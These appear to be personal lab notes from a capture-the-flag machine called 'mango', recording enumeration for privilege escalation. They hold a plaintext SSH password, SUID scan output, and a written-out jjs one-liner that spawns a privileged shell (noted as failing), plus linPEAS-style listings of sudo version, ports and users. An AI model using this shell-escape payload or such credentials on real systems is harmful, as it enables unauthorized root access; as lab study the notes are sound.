3 box enum mango
SuidEnum
# ssh mango:h3mXK8RhU~f{]f5H
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/bin/run-mailcap
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
------------------------------
[#] SUID Binaries in GTFO bins list (Hell Yeah!)
------------------------------
-~> https://gtfobins.github.io/gtfobins/jjs/#suid
------------------------------
[&] Manual Exploitation (Binaries which create files on the system)
------------------------------
[&] Jjs ( /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs )
echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
------------------------------
# tried exploitation; didnt work
-bash: /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs: Permission denied
-rwsr-sr-- 1 root admin 11K Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
# we need to become admin to run this.
PEAS
╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
╣ Active Ports
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
╣ Users with console
mango:x:1000:1000:mango:/home/mango:/bin/bash
root:x:0:0:root:/root:/bin/bash
admin:x:4000000000:1001:,,,:/home/admin/:/bin/sh
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
-rw-r--r-- 1 root root 626 Dec 19 2013 /etc/mongod.conf
Last updated